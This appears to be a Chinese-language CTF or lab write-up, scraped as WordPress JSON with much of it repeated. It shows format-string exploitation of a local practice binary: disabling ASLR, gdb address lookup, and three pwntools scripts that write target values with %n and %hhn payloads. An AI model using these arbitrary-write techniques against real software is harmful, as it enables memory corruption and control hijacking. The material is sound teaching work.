\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6<\/p>\n\n\n\n
\u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a\u53d8\u91cf\uff0c\u6210\u529f\u6253\u5370\u76f8\u5e94\u7684puts\u4fe1\u606f\u3002<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u4f8b\u5982\uff0c\u5bf9\u4e8e\u53d8\u91cfc\u7684\u8986\u76d6\uff0c\u8f93\u51fa\u7ed3\u679c\u5982\u4e0b\u56fe\uff0c\u6210\u529f\u6253\u5370\uff1aoverwrite c successfully\u3002<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u89e3\u51b3\u65b9\u6cd5\uff1a<\/h2>\n\n\n\n\u9996\u5148\u5173\u95edASLR<\/strong>\uff08\u786e\u4fdd\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\necho 0 | sudo tee \/proc\/sys\/kernel\/randomize_va_space<\/pre>\n\n\n\n\u8fdb\u5165a == 0x10<\/h3>\n\n\n\n\u9700\u8981\u786e\u5b9a\u4e24\u70b9\uff1aa\u7684\u5730\u5740\uff0ca\u7684\u504f\u79fb\u91cf<\/p>\n\n\n\na\u7684\u5730\u5740\u53ef\u901a\u8fc7gdb\u8c03\u8bd5\u7a0b\u5e8f\u6765\u83b7\u53d6\uff0c\u5177\u4f53\u65b9\u6cd5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\nb vulnfunc<\/p>\n\n\n\nr<\/p>\n\n\n\ndisassemble<\/p>\n\n\n\n\u53ef\u4ee5\u770b\u5230a\u53d8\u91cf\u58f0\u660e\u7684\u4ee3\u7801<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u5728\u58f0\u660ea\u53d8\u91cf\u540e\u8bbe\u7f6e\u65ad\u70b9 b *0x08049219<\/p>\n\n\n\nc<\/p>\n\n\n\nx\/wx $ebp-0x110<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u662fa\u7684\u503c<\/p>\n\n\n\n\uff01\uff01\uff01\uff01\uff01\u4f46\u662f\uff0c\u5728\u5229\u75280xffffd028\u6765\u4f5c\u4e3aa\u7684\u5730\u5740\u65f6\uff0c\u65e0\u6cd5\u6b63\u5e38\u8986\u5199<\/p>\n\n\n\n\u539f\u56e0\u662f\uff1a\u5728\u8c03\u8bd5\u5668\u4e2d\u548c\u5b9e\u9645\u8fd0\u884c\u65f6\uff0c\u7a0b\u5e8f\u7684\u5185\u5b58\u5e03\u5c40\u53ef\u80fd\u6709\u6240\u4e0d\u540c\u3002\u8fd9\u79cd\u5dee\u5f02\u53ef\u80fd\u662f\u7531\u4e8e\u8c03\u8bd5\u5668\u5bf9\u7a0b\u5e8f\u7684\u5f71\u54cd\uff08\u5982\u8c03\u8bd5\u5668\u4f1a\u6539\u53d8\u7a0b\u5e8f\u7684\u5185\u5b58\u5206\u914d\uff09<\/p>\n\n\n\n\u6240\u4ee5\u6211\u4eec\u4fee\u6539\u6e90\u4ee3\u7801\uff01\u5e2e\u6211\u4eec\u6253\u5370\u51fa\u6765a\u7684\u5730\u5740\uff01<\/p>\n\n\n\n\u5c06\u6e90\u4ee3\u7801\u6539\u4e3a\uff08\u7ea2\u6846\u4e3a\u6dfb\u52a0\u5185\u5bb9\uff09\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u4e0b\u9762\u6211\u4eec\u8fd0\u884c\u7a0b\u5e8f\u5c31\u80fd\u770b\u5230a\u5728\u6267\u884c\u65f6\u7684\u5730\u5740<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n p = process('.\/test2')\n\n # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n a_addr = 0xffffd078 # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n payload = p32(a_addr) + b\"%12c%7$n\" # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\n print(p.clean())\n p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u4f8b\u5982\uff0c\u5bf9\u4e8e\u53d8\u91cfc\u7684\u8986\u76d6\uff0c\u8f93\u51fa\u7ed3\u679c\u5982\u4e0b\u56fe\uff0c\u6210\u529f\u6253\u5370\uff1aoverwrite c successfully\u3002<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u89e3\u51b3\u65b9\u6cd5\uff1a<\/h2>\n\n\n\n\u9996\u5148\u5173\u95edASLR<\/strong>\uff08\u786e\u4fdd\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\necho 0 | sudo tee \/proc\/sys\/kernel\/randomize_va_space<\/pre>\n\n\n\n\u8fdb\u5165a == 0x10<\/h3>\n\n\n\n\u9700\u8981\u786e\u5b9a\u4e24\u70b9\uff1aa\u7684\u5730\u5740\uff0ca\u7684\u504f\u79fb\u91cf<\/p>\n\n\n\na\u7684\u5730\u5740\u53ef\u901a\u8fc7gdb\u8c03\u8bd5\u7a0b\u5e8f\u6765\u83b7\u53d6\uff0c\u5177\u4f53\u65b9\u6cd5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\nb vulnfunc<\/p>\n\n\n\nr<\/p>\n\n\n\ndisassemble<\/p>\n\n\n\n\u53ef\u4ee5\u770b\u5230a\u53d8\u91cf\u58f0\u660e\u7684\u4ee3\u7801<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u5728\u58f0\u660ea\u53d8\u91cf\u540e\u8bbe\u7f6e\u65ad\u70b9 b *0x08049219<\/p>\n\n\n\nc<\/p>\n\n\n\nx\/wx $ebp-0x110<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u662fa\u7684\u503c<\/p>\n\n\n\n\uff01\uff01\uff01\uff01\uff01\u4f46\u662f\uff0c\u5728\u5229\u75280xffffd028\u6765\u4f5c\u4e3aa\u7684\u5730\u5740\u65f6\uff0c\u65e0\u6cd5\u6b63\u5e38\u8986\u5199<\/p>\n\n\n\n\u539f\u56e0\u662f\uff1a\u5728\u8c03\u8bd5\u5668\u4e2d\u548c\u5b9e\u9645\u8fd0\u884c\u65f6\uff0c\u7a0b\u5e8f\u7684\u5185\u5b58\u5e03\u5c40\u53ef\u80fd\u6709\u6240\u4e0d\u540c\u3002\u8fd9\u79cd\u5dee\u5f02\u53ef\u80fd\u662f\u7531\u4e8e\u8c03\u8bd5\u5668\u5bf9\u7a0b\u5e8f\u7684\u5f71\u54cd\uff08\u5982\u8c03\u8bd5\u5668\u4f1a\u6539\u53d8\u7a0b\u5e8f\u7684\u5185\u5b58\u5206\u914d\uff09<\/p>\n\n\n\n\u6240\u4ee5\u6211\u4eec\u4fee\u6539\u6e90\u4ee3\u7801\uff01\u5e2e\u6211\u4eec\u6253\u5370\u51fa\u6765a\u7684\u5730\u5740\uff01<\/p>\n\n\n\n\u5c06\u6e90\u4ee3\u7801\u6539\u4e3a\uff08\u7ea2\u6846\u4e3a\u6dfb\u52a0\u5185\u5bb9\uff09\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u4e0b\u9762\u6211\u4eec\u8fd0\u884c\u7a0b\u5e8f\u5c31\u80fd\u770b\u5230a\u5728\u6267\u884c\u65f6\u7684\u5730\u5740<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n p = process('.\/test2')\n\n # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n a_addr = 0xffffd078 # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n payload = p32(a_addr) + b\"%12c%7$n\" # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\n print(p.clean())\n p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u9996\u5148\u5173\u95edASLR<\/strong>\uff08\u786e\u4fdd\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\necho 0 | sudo tee \/proc\/sys\/kernel\/randomize_va_space<\/pre>\n\n\n\n\u8fdb\u5165a == 0x10<\/h3>\n\n\n\n\u9700\u8981\u786e\u5b9a\u4e24\u70b9\uff1aa\u7684\u5730\u5740\uff0ca\u7684\u504f\u79fb\u91cf<\/p>\n\n\n\na\u7684\u5730\u5740\u53ef\u901a\u8fc7gdb\u8c03\u8bd5\u7a0b\u5e8f\u6765\u83b7\u53d6\uff0c\u5177\u4f53\u65b9\u6cd5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\nb vulnfunc<\/p>\n\n\n\nr<\/p>\n\n\n\ndisassemble<\/p>\n\n\n\n\u53ef\u4ee5\u770b\u5230a\u53d8\u91cf\u58f0\u660e\u7684\u4ee3\u7801<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u5728\u58f0\u660ea\u53d8\u91cf\u540e\u8bbe\u7f6e\u65ad\u70b9 b *0x08049219<\/p>\n\n\n\nc<\/p>\n\n\n\nx\/wx $ebp-0x110<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u662fa\u7684\u503c<\/p>\n\n\n\n\uff01\uff01\uff01\uff01\uff01\u4f46\u662f\uff0c\u5728\u5229\u75280xffffd028\u6765\u4f5c\u4e3aa\u7684\u5730\u5740\u65f6\uff0c\u65e0\u6cd5\u6b63\u5e38\u8986\u5199<\/p>\n\n\n\n\u539f\u56e0\u662f\uff1a\u5728\u8c03\u8bd5\u5668\u4e2d\u548c\u5b9e\u9645\u8fd0\u884c\u65f6\uff0c\u7a0b\u5e8f\u7684\u5185\u5b58\u5e03\u5c40\u53ef\u80fd\u6709\u6240\u4e0d\u540c\u3002\u8fd9\u79cd\u5dee\u5f02\u53ef\u80fd\u662f\u7531\u4e8e\u8c03\u8bd5\u5668\u5bf9\u7a0b\u5e8f\u7684\u5f71\u54cd\uff08\u5982\u8c03\u8bd5\u5668\u4f1a\u6539\u53d8\u7a0b\u5e8f\u7684\u5185\u5b58\u5206\u914d\uff09<\/p>\n\n\n\n\u6240\u4ee5\u6211\u4eec\u4fee\u6539\u6e90\u4ee3\u7801\uff01\u5e2e\u6211\u4eec\u6253\u5370\u51fa\u6765a\u7684\u5730\u5740\uff01<\/p>\n\n\n\n\u5c06\u6e90\u4ee3\u7801\u6539\u4e3a\uff08\u7ea2\u6846\u4e3a\u6dfb\u52a0\u5185\u5bb9\uff09\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u4e0b\u9762\u6211\u4eec\u8fd0\u884c\u7a0b\u5e8f\u5c31\u80fd\u770b\u5230a\u5728\u6267\u884c\u65f6\u7684\u5730\u5740<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n p = process('.\/test2')\n\n # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n a_addr = 0xffffd078 # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n payload = p32(a_addr) + b\"%12c%7$n\" # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\n print(p.clean())\n p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep 